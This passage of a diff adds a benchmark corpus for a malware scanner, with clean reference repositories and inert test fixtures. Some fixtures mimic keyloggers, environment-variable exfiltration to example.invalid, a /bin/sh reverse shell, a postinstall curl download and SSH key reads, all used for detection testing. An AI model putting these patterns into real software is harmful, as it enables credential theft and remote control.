null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "vuejs/core", "ref": null } + }, + { + "sampleId": "reference-svelte", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/sveltejs/svelte", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "sveltejs/svelte", "ref": null } + }, + { + "sampleId": "reference-vite", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vitejs/vite", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "vitejs/vite", "ref": null } + }, + { + "sampleId": "reference-next", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vercel/next.js", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "vercel/next.js", "ref": null } + }, + { + "sampleId": "reference-nest", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/nestjs/nest", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "nestjs/nest", "ref": null } + }, + { + "sampleId": "noisy-vscode", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/vscode", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "microsoft/vscode", "ref": null } + }, + { + "sampleId": "noisy-playwright", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/playwright", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "microsoft/playwright", "ref": null } + }, + { + "sampleId": "noisy-cypress", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/cypress-io/cypress", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "cypress-io/cypress", "ref": null } + }, + { + "sampleId": "noisy-electron", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/electron/electron", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "electron/electron", "ref": null } + }, + { + "sampleId": "noisy-esbuild", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/evanw/esbuild", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "evanw/esbuild", "ref": null } + }, + { + "sampleId": "noisy-node", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/nodejs/node", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "nodejs/node", "ref": null } + } + ] +} diff --git a/benchmark/corpus.lock.json b/benchmark/corpus.lock.json new file mode 100644 index 0000000..94c176f --- /dev/null +++ b/benchmark/corpus.lock.json @@ -0,0 +1,1534 @@ +{ + "benchmarkVersion": "0.1.0", + "sources": [ + { + "name": "OpenSSF Malicious Packages", + "url": "https://github.com/ossf/malicious-packages", + "usage": "Independent labels and package/version metadata; withdrawn reports must be excluded." + }, + { + "name": "Datadog malicious software packages dataset", + "url": "https://github.com/DataDog/malicious-software-packages-dataset", + "usage": "Human-triaged private static-sample evaluation only; archives must never be executed." + }, + { + "name": "GitHub Amalfi artifact", + "url": "https://github.com/githubnext/amalfi-artifact", + "usage": "Methodology comparison and externally labeled experiment data." + } + ], + "samples": [ + { + "sampleId": "critical-keylogger-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed behavior: keyboard capture plus network sink", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "EXFIL_KEYLOGGER" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture() { document.addEventListener('keydown', event => { fetch('https://example.invalid/collect', { method: 'POST', body: event.key }) }) }\n" + } + } + }, + { + "sampleId": "critical-beavertail-loader-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Lazarus BeaverTail loader structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "BEAVERTAIL_LOADER_V1" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture() { require('child_process').exec('curl https://example.invalid/payload') }\n" + } + } + }, + { + "sampleId": "critical-env-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed environment-variable exfiltration structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "BEAVERTAIL_EXFIL" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture() { const body = JSON.stringify(process.env); fetch('https://example.invalid/collect', { method: 'POST', body }) }\n" + } + } + }, + { + "sampleId": "critical-reverse-shell-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed reverse-shell socket structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "REVERSE_SHELL" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(net) { const socket = net.Socket(); const shell = require('child_process').spawn('/bin/sh'); socket.pipe(shell.stdin); shell.stdout.pipe(socket); return socket }\n" + } + } + }, + { + "sampleId": "critical-crypto-miner-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed cryptocurrency-miner endpoint structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "CRYPTO_MINER" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export const inertPoolReference = 'stratum+tcp://example.invalid:3333'\n" + } + } + }, + { + "sampleId": "critical-obfuscated-eval-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Base64-decoded dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "OBFUSCATED_EVAL" + ], + "minimumExpectedVerdict": "medium", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(encoded) { if (false) eval(atob(encoded)) }\n" + } + } + }, + { + "sampleId": "critical-rce-endpoint-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed request-driven remote-code-execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "BACKDOOR_RCE_ENDPOINT" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(req) { if (false) eval(req.body.command) }\n" + } + } + }, + { + "sampleId": "critical-credential-file-read-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed credential-file access structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "FILE_ACCESS_CREDENTIALS" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(fs) { if (false) fs.readFileSync('/home/example/.ssh/id_rsa') }\n" + } + } + }, + { + "sampleId": "critical-aws-key-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed AWS access-key pattern using a reserved dummy value", + "sourceUrl": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "HARDCODED_AWS_KEY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export const inertDummyAwsKey = 'AKIA1234567890ABCDEF'\n" + } + } + }, + { + "sampleId": "critical-install-script-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed install-time download and dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": [ + "POSTINSTALL_SCRIPT" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"inert-install-fixture\",\"version\":\"1.0.0\",\"scripts\":{\"postinstall\":\"curl https://example.invalid/payload && node -e \\\"eval('')\\\"\"}}\n" + } + } + }, + { + "sampleId": "reference-fixture-keyboard-shortcut-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for ordinary keyboard UI handling", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "src/ui.js": "document.addEventListener('keydown', event => { if (event.key === 'Escape') closeModal() })\n" + } + } + }, + { + "sampleId": "reference-fixture-placeholder-secret-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for documented placeholder configuration", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "app.py": "app.secret_key = 'your-secret-key-change-in-production'\n" + } + } + }, + { + "sampleId": "reference-fixture-flask-debug-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control: deployment warning must not be labeled a backdoor", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "app.py": "app.run(debug=True, host='0.0.0.0', port=5000)\n" + } + } + }, + { + "sampleId": "reference-fixture-detector-regex-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for security tools containing inert detector regexes", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "src/rules.js": "export const keyloggerPattern = /addEventListener\\(['\\\"']keydown/gi\nexport const minerPattern = /stratum\\+tcp:\\/\\//gi\n" + } + } + }, + { + "sampleId": "reference-fixture-event-stream-safe-version-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Version-bound negative control for the compromised event-stream 3.3.6 incident", + "sourceUrl": "https://github.com/dominictarr/event-stream", + "immutableRef": "package:event-stream@4.0.1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"reference-consumer\",\"version\":\"1.0.0\",\"dependencies\":{\"event-stream\":\"4.0.1\"}}\n" + } + } + }, + { + "sampleId": "reference-express", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/expressjs/express", + "immutableRef": "ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "expressjs/express", + "ref": "ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "reference-fastify", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/fastify/fastify", + "immutableRef": "de3752df84bb8dd35a8226bb467f05862f4da57c", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "fastify/fastify", + "ref": "de3752df84bb8dd35a8226bb467f05862f4da57c" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-koa", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/koajs/koa", + "immutableRef": "52d5e8ff5ac79f2479463b53df2999900ae95115", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "koajs/koa", + "ref": "52d5e8ff5ac79f2479463b53df2999900ae95115" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "reference-axios", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/axios/axios", + "immutableRef": "3ebc76240c835a07fc6af23cb10d41579371a08f", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "axios/axios", + "ref": "3ebc76240c835a07fc6af23cb10d41579371a08f" + }, + "defaultBranchAtPin": "v1.x" + }, + { + "sampleId": "reference-lodash", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/lodash/lodash", + "immutableRef": "a666ba591064c8011988275790ad7d625279f09c", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "lodash/lodash", + "ref": "a666ba591064c8011988275790ad7d625279f09c" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-chalk", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/chalk/chalk", + "immutableRef": "aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "chalk/chalk", + "ref": "aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-uuid", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/uuidjs/uuid", + "immutableRef": "ea83515d6a4de13a8f9d253fe772752c9dd7bbbe", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "uuidjs/uuid", + "ref": "ea83515d6a4de13a8f9d253fe772752c9dd7bbbe" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-node-fetch", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/node-fetch/node-fetch", + "immutableRef": "8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "node-fetch/node-fetch", + "ref": "8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-react", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/facebook/react", + "immutableRef": "c0c39a6b3907eaab35f43074949e2957a2a734c1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "facebook/react", + "ref": "c0c39a6b3907eaab35f43074949e2957a2a734c1" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-vue", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vuejs/core", + "immutableRef": "9e03beb6b4c85a9d5b49b731c08263aa648e2a2a", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "vuejs/core", + "ref": "9e03beb6b4c85a9d5b49b731c08263aa648e2a2a" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-svelte", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/sveltejs/svelte", + "immutableRef": "b4d1583ae20f3869a88a731d9a265c546c099f66", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "sveltejs/svelte", + "ref": "b4d1583ae20f3869a88a731d9a265c546c099f66" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-vite", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vitejs/vite", + "immutableRef": "fef682d3f067d534a559faf6fd9baedda2e9f8f1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "vitejs/vite", + "ref": "fef682d3f067d534a559faf6fd9baedda2e9f8f1" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-next", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vercel/next.js", + "immutableRef": "93249ee06d6e0c105b1278412768c8e0816d9936", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "vercel/next.js", + "ref": "93249ee06d6e0c105b1278412768c8e0816d9936" + }, + "defaultBranchAtPin": "canary" + }, + { + "sampleId": "reference-nest", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/nestjs/nest", + "immutableRef": "f2938487c45db149964a8b0efc58a073610dcdf1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "nestjs/nest", + "ref": "f2938487c45db149964a8b0efc58a073610dcdf1" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "noisy-vscode", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/vscode", + "immutableRef": "af2c64423e7ee5d1030a000c82a0bb774d043351", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "microsoft/vscode", + "ref": "af2c64423e7ee5d1030a000c82a0bb774d043351" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-playwright", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/playwright", + "immutableRef": "2670e5cae0239502d053e530da2c675e5aa536aa", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "microsoft/playwright", + "ref": "2670e5cae0239502d053e530da2c675e5aa536aa" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-cypress", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/cypress-io/cypress", + "immutableRef": "cd8bb88f1080d0ee354e605fadba986b03320828", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "cypress-io/cypress", + "ref": "cd8bb88f1080d0ee354e605fadba986b03320828" + }, + "defaultBranchAtPin": "develop" + }, + { + "sampleId": "noisy-electron", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/electron/electron", + "immutableRef": "8215b5aa536ec6ae121003bc618bdd825bdbbb0f", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "electron/electron", + "ref": "8215b5aa536ec6ae121003bc618bdd825bdbbb0f" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-esbuild", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/evanw/esbuild", + "immutableRef": "6ff1d8b0d8c134e867a397eef39702a223ebef9e", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "evanw/esbuild", + "ref": "6ff1d8b0d8c134e867a397eef39702a223ebef9e" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-node", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/nodejs/node", + "immutableRef": "1314579f8c82ed70b8cbe736fdea1df48624c285", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "nodejs/node", + "ref": "1314579f8c82ed70b8cbe736fdea1df48624c285" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-hapijs-hapi", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/hapijs/hapi", + "immutableRef": "d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "hapijs/hapi", + "ref": "d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "reference-reduxjs-redux", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/reduxjs/redux", + "immutableRef": "5d65348e26635b6ec627b1030732ed38797e88e9", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "reduxjs/redux", + "ref": "5d65348e26635b6ec627b1030732ed38797e88e9" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "reference-reduxjs-redux-toolkit", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/reduxjs/redux-toolkit", + "immutableRef": "7b269256424e1d44baf83d7de634d9f53931dda7", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "reduxjs/redux-toolkit", + "ref": "7b269256424e1d44baf83d7de634d9f53931dda7" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "reference-immerjs-immer", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/immerjs/immer", + "immutableRef": "60ca295e1185db80322ef55ec3fb8475cbc960c7", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "immerjs/immer", + "ref": "60ca295e1185db80322ef55ec3fb8475cbc960c7" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-date-fns-date-fns", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/date-fns/date-fns", + "immutableRef": "4098115cf705e3af7f663d8e5b0686e39a9f478a", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "date-fns/date-fns", + "ref": "4098115cf705e3af7f663d8e5b0686e39a9f478a" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-ramda-ramda", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/ramda/ramda", + "immutableRef": "bcb320e60b5d91c958a6b02feb0bd8658d744298", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "ramda/ramda", + "ref": "bcb320e60b5d91c958a6b02feb0bd8658d744298" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "reference-sindresorhus-got", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/sindresorhus/got", + "immutableRef": "e3924aa1e53a6ca3eb93a43618ce532442a89b40", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "sindresorhus/got", + "ref": "e3924aa1e53a6ca3eb93a43618ce532442a89b40" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-socketio-socket-io", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/socketio/socket.io", + "immutableRef": "d2d753fed4435015c2d83fe62e676b44e07fa3f7", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "socketio/socket.io", + "ref": "d2d753fed4435015c2d83fe62e676b44e07fa3f7" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-apollographql-apollo-client", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/apollographql/apollo-client", + "immutableRef": "c843c98a803d7d7f48f4da72080a61d9086dc8ad", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "apollographql/apollo-client", + "ref": "c843c98a803d7d7f48f4da72080a61d9086dc8ad" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-tanstack-query", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/TanStack/query", + "immutableRef": "79d2384db5c8776680d5bfbe9b595618c066248b", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "TanStack/query", + "ref": "79d2384db5c8776680d5bfbe9b595618c066248b" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-testing-library-react-testing-library", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/testing-library/react-testing-library", + "immutableRef": "be9d81d91314c9f0bafaa363f70b409b4b31989c", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "testing-library/react-testing-library", + "ref": "be9d81d91314c9f0bafaa363f70b409b4b31989c" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-prisma-prisma", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/prisma/prisma", + "immutableRef": "cda80a4488b7b551c36bf09ca2e8303ef9509da4", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "prisma/prisma", + "ref": "cda80a4488b7b551c36bf09ca2e8303ef9509da4" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-tailwindlabs-tailwindcss", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/tailwindlabs/tailwindcss", + "immutableRef": "35a3e9c5159bea77af0d48f0c8849279211cc7e9", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "tailwindlabs/tailwindcss", + "ref": "35a3e9c5159bea77af0d48f0c8849279211cc7e9" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-prettier-prettier", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/prettier/prettier", + "immutableRef": "41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "prettier/prettier", + "ref": "41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-eslint-eslint", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/eslint/eslint", + "immutableRef": "c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "eslint/eslint", + "ref": "c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "reference-pnpm-pnpm", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/pnpm/pnpm", + "immutableRef": "0dd21df7457d2026f411f2c1a09104280b9b16e5", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "pnpm/pnpm", + "ref": "0dd21df7457d2026f411f2c1a09104280b9b16e5" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-denoland-deno", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/denoland/deno", + "immutableRef": "e5aed78415ded1213794bbf1ebbde1bf5cfa08b4", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "denoland/deno", + "ref": "e5aed78415ded1213794bbf1ebbde1bf5cfa08b4" + }, + "defaultBranchAtPin": 